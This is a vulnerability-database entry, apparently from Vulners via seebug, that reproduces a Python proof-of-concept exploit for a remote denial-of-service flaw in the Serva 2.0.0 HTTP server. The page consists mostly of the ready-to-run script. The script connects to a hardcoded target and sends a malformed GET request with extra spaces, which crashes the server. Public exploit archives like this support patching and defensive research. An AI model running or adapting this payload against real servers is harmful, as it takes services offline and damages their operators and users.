Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Serva 2.0.0 - HTTP Server GET Remote Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 24 Views

Serva 2.0.0 HTTP Server GET Remote Denial of Service Vulnerability - Malformed GET Request causes the cras

Code

                                                #!/usr/bin/python

# Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed GET Request causes the crash
# Howto:         -
 
import socket

target="192.168.0.21"
port=80

# 0000   47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d  GET  / HTTP/1.1.
# 0010   0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39  .Host: http://19
# 0020   32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74  2.168.0.21..Cont
# 0030   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d  ent-Length: 0...
# 0040   0a                                               .

payload = (
"\x47\x45\x54\x20\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #tcp
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!\n"
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
serva 2.0.0http serverremote denial of servicevulnerabilitymalformed get requestcrashjulien ahrensinshell.netvercot.comwindows xp sp3professional germansocketexploit
24